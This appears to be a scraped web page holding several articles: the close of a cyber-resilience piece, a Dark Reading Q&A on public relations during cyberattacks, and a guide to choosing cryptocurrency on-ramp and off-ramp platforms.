*   Run continuous breach simulations: Make breach simulations part of your daily routine. Simulate phishing, ransomware, and supply chain attacks to identify vulnerabilities before real attackers exploit them. Leading companies, inspired by chaos engineering, run controlled breach tests every day, treating each one as an opportunity to fine-tune their incident response plans. 
    
*   Adopt self-healing systems: AI-powered self-healing systems minimize downtime by automatically detecting and isolating compromised systems, ensuring your business keeps running. With 24/7 monitoring tools, you can spot unusual behavior fast, allowing your teams to focus on strategic initiatives instead of reactive firefighting. 
    
*   Leverage AI-driven threat intelligence sharing: Join intelligence-sharing networks like ISACs to collaborate with peers. Real-time threat data allows organizations to stay ahead of emerging threats. Platforms like MITRE ATT&CK help teams analyze adversary behaviors, enabling them to fine-tune defense strategies. 
    
*   Prepare for quantum computing: While quantum computing is still emerging, it could eventually break today's encryption standards. Start preparing now by researching quantum-resistant encryption and staying informed on the latest industry developments. 
    
*   Create a resilience-first culture: Resilience shouldn't just be a buzzword — it must become part of your company's DNA. Encourage your teams to learn from every incident, find gaps in your defenses, and use them as opportunities to build stronger systems. Regularly debrief after breaches to reflect on what went right, not just what went wrong. This helps create a culture of continuous improvement, ensuring that your organization gets stronger after every incident. 
    

Resilience isn't just the CISO's job. CEOs and compliance officers also play crucial roles in aligning the entire organization with resilience strategies. Regulatory frameworks like Europe's General Data Protection Regulation (GDPR) and the US Portability and Accountability Act (HIPAA) demand transparent recovery protocols, and how leadership handles breaches impacts brand trust, shareholder confidence, and customer loyalty.

**Leading With Resilience**

The future of cybersecurity isn't about preventing every breach — it's about learning and growing stronger with each attack. Companies that turn breaches into opportunities for innovation won't just survive — they'll lead. By adopting resilience-first strategies, continuous improvement, and adaptive defenses, your organization can turn security challenges into competitive advantages. 

**About the Author**

Senior Manager, Black Duck Software

Akhil Mittal is a recognized cybersecurity leader with more than two decades of experience in application security, cloud security, and DevSecOps. As a Gartner Cybersecurity ambassador and senior manager at Black Duck Software, he leads key security initiatives, helping global organizations strengthen their defenses against advanced cyber threats. Akhil has worked closely with chief information security officers (CISOs) and executive leadership to align security strategies with business goals, ensuring robust protection across industries. He also contributes his expertise through leading cybersecurity publications and serves as a judge for top industry awards and hackathons. Certified in CISSP and CCSP, his work continues to shape the future of cybersecurity, driving innovation and resilience worldwide.

Cybersecurity Is Critical, but Breaches Don't Have to Be Disasters

When a cybersecurity incident occurs, it's not just IT systems and data that are at risk — a company's reputation is on the line, too.

Source: Panther Media GmbH via Alamy Stock Photo

Question: What value do public relations experts bring to a company during a cybersecurity incident?

Ronn Torossian, founder, 5WPR: The threat of a cyberattack is ever-present, making cybersecurity a top priority for organizations of all sizes. But when a cybersecurity incident occurs, it's not just IT systems and data that are at risk — a company's reputation is on the line, too. This is where public relations (PR) can step in as a critical safeguard. A well-executed cybersecurity PR strategy can help contain the fallout of a cybersecurity breach, maintain stakeholder trust, and position the organization for recovery.

Here are five ways PR professionals can protect a company against damage from a cybersecurity incident.

**1\. Build Trust With Stakeholders Ahead of Time**

PR's role in a cybersecurity incident starts long before a breach happens. Proactive engagement with stakeholders builds a reservoir of goodwill to draw upon in times of crisis. Engagement includes providing regular updates on the company's cybersecurity measures, sharing tips for data protection, and offering insights into industry best practices.

For instance, tech giants like Cisco and IBM consistently communicate their cybersecurity initiatives, positioning themselves as leaders in the space. By doing so, they reinforce their commitment to security. This proactive approach helps set the stage for smoother communication during a crisis.

**2\. Communicate With Transparency and Speed**

The first hours of a cybersecurity breach are crucial. Prompt, transparent communication helps shape public perception and can significantly influence the level of trust that stakeholders place in the company. When an incident occurs, PR teams must work swiftly to inform customers, employees, and partners about what happened, what steps the company is taking, and what they should do next.

A classic negative case study is Equifax's 2017 breach, where delayed communication compounded the public's distrust. Companies that immediately acknowledge a breach and provide clear updates often regain trust faster. Transparency demonstrates accountability and commitment, both of which are key to repairing reputational damage.

**3\. Harness Social Media for Crisis Responses**

Social media is a double-edged sword in the wake of a cybersecurity breach. These digital channels amplify both the reach of the company's crisis communications and the spread of misinformation or negative sentiment. A strong social media strategy is essential for managing the narrative.

PR teams should use platforms like LinkedIn and other digital channels to provide real-time updates, address customer concerns, and reinforce the company's commitment to resolving the issue. These channels offer an opportunity to humanize the brand, which can help mitigate panic and frustration.

**4\. Bring in Cybersecurity Teams for Updates**

Effective crisis communication requires more than just PR expertise. Collaboration with IT and cybersecurity teams ensures that messaging is accurate, clear, and credible.

Cybersecurity experts lend authority to media briefings or stakeholder updates and signal that the situation is under control. PR professionals translate complex technical details into language that resonates with diverse audiences. This partnership helps build confidence in the organization's ability to manage and resolve cybersecurity incidents.

**5\. Rebuild Trust After an Attack**

Long-term organizational recovery from a cybersecurity breach depends on rebuilding trust, which is rooted in ongoing education and advocacy. PR teams can drive awareness campaigns that encourage both internal and external audiences to adopt better cybersecurity practices.

This might involve publishing blogs, hosting webinars, or participating in industry panels to share insights on navigating the evolving threat landscape. Advocacy for stronger industry standards or collaboration on public policy can further position the company as a thought leader committed to enhancing cybersecurity for all.

**About the Author**

Dark Reading

The Edge is Dark Reading's home for features, threat data and in-depth perspectives on cybersecurity.

How Can PR Protect Companies During a Cyberattack?

Choosing the best on-ramp and off-ramp solutions is a key part of navigating the cryptocurrency landscape – to…

Choosing the best on-ramp and off-ramp solutions is a key part of navigating the cryptocurrency landscape – to avoid getting swept into the complex sea of choices, select the options that offer security, support of various currencies, minimum fees, compliance with regulation, liquidity, a good reputation, a good user experience and reliable customer support.

In addition, you should understand your business model and avoid treasury fund risks to further increase your ability to operate successfully in the crypto space. In other words, the right on-ramp and off-ramp is all you need to comfortably enter the world of digital assets and achieve the best possible outcome.

****Key Factors for Selection****

When evaluating on-ramp and off-ramp solutions, several important elements should be considered. Below is a comprehensive overview of the key factors that can influence your decision-making process.

****Security measures****

When it comes to cryptocurrency transactions, security is everything. Make sure the on-ramp and off-ramp platforms you look at have strong security features. Look for features such as:

*   **Two-factor authentication (2FA)** – this adds an extra layer of security by requiring not only a password but also a second form of verification.
*   **Encryption protocols** – strong encryption protects sensitive data and ensures that personal information and transaction details are secure.
*   **Regular security audits** – Platforms that regularly get security audits will increase your trustworthiness.

****Supported currencies and countries****

Before you choose an on-ramp or off-ramp, you need to check what cryptocurrencies and Fiat currencies are supported. Different platforms have different capabilities and your preferred assets must be available for smooth transactions.

*   **Cryptocurrency availability** – make sure the platform supports the cryptocurrencies you intend to buy or sell. Popular options like Bitcoin and Ethereum are commonly supported, but niche coins may not be universally available.
*   **Geographic coverage** – not all platforms will be available in all regions, due to regulatory restrictions. Make sure the service is available in your area so you don’t run into trouble.

****Fees and Costs****

Different platforms can have wildly different transaction fees. Comparing fees is a good way to find the most cost-effective solution for your needs.

*   **Transaction fees** – typically transaction fees come in as a percentage of the transaction amount. Seek out platforms with competitive rates.
*   **Withdrawal fees** – some platforms charge additional fees for withdrawing funds to a bank account. Factor these into your overall cost calculations.
*   **Hidden fees** – watch out for hidden fees. Always read the fine print to know the total cost.

****Regulatory Compliance****

Compliance with financial regulations is paramount for any on-ramp or off-ramp service. Ensure that the platform you choose adheres to relevant laws and regulations, including:

*   **Know your customer (KYC)** – platforms should have full KYC processes in place to verify the identity of users and prevent fraudulent activities.
*   **Anti-money laundering (AML)** – compliance with AML regulations helps to ensure that the platform operates within legal boundaries and reduces the risk of illicit activities.

****Liquidity and transaction speed****

Liquidity refers to how easily an asset can be bought or sold without affecting its price. When selecting an on-ramp or off-ramp, consider the following factors:

*   **Transaction Speed** – Check how fast transactions are processed. Speed is especially important for off-ramps because frustration can result from delays.
*   **Liquidity Levels** – slippage can be reduced when converting between cryptocurrencies and fiat using a platform with high liquidity.

****Reputation and track record****

The reputation of an on-ramp or off-ramp provider can make or break your experience. When evaluating a provider’s credibility take the following into consideration:

*   **Customer reviews** – feedback from other users will tell you how they’ve found the platform. They can speak to whether they are reliable and trustworthy.
*   **Industry recognition** – awards or recognition from reputable industry bodies can serve as a testament to the platform’s credibility.

****Focus on interface and functionality****

On-ramps and off-ramps are much easier to use if they have a user-friendly interface.  Consider the following aspects:

*   **Ease of navigation** – platforms with intuitive interfaces make it easier for users to complete transactions without confusion.

****Evaluate service quality****

Access to quality customer support is essential for resolving issues that may arise during transactions. Consider the following when assessing customer support options:

*   **Availability** – look for platforms that offer 24/7 support to address any concerns promptly.
*   **Multiple language options –** if you operate in a diverse market, having support available in multiple languages can enhance accessibility.

****Understand your business model****

When selecting an on-ramp or off-ramp, it’s essential to understand your business model and customer base. 

*   **Customer demographics –** identify the needs and preferences of your target audience. This understanding can guide your choice of platform.
*   **Scalability –** ensure that the solution you choose can scale with your business as it grows. A flexible platform can accommodate future expansion.

****Avoid treasury fund risks****

While on-ramps and off-ramps are essential for transactions, you need to avoid using them as a means to hold large amounts of treasury funds. 

*   **Stablecoin risks** – implement monitoring for stablecoin de-peg risks to protect your assets from market fluctuations.
*   **Regular reviews** – regularly review and update your on-ramp and off-ramp strategy to adapt to changing market conditions.

Nevertheless, choosing the right on-ramp and off-ramp solutions requires careful consideration of factors like security, supported currencies, fees, compliance, liquidity, user experience, and customer support. You can create an efficient entry and exit strategy for the cryptocurrency market by aligning these elements with your business model and operational needs.

Additionally, focusing on regular checks and staying flexible to market changes ensures smooth transactions and protects your assets. With the right approach, these platforms can empower you to confidently navigate the digital asset infrastructure and achieve your financial goals.

1.  How to Launch a Successful ICO: 2024 Guide
2.  The Future of Pi Coin: Potential and Predictions
3.  12 Tips for Managing Cryptocurrency Market Volatility
4.  Fully Offline Electronic Cash: Is It an Intractable Problem?
5.  How Bitcoin’s digital signature feature facilitates Web3 adoption

Tag

#auth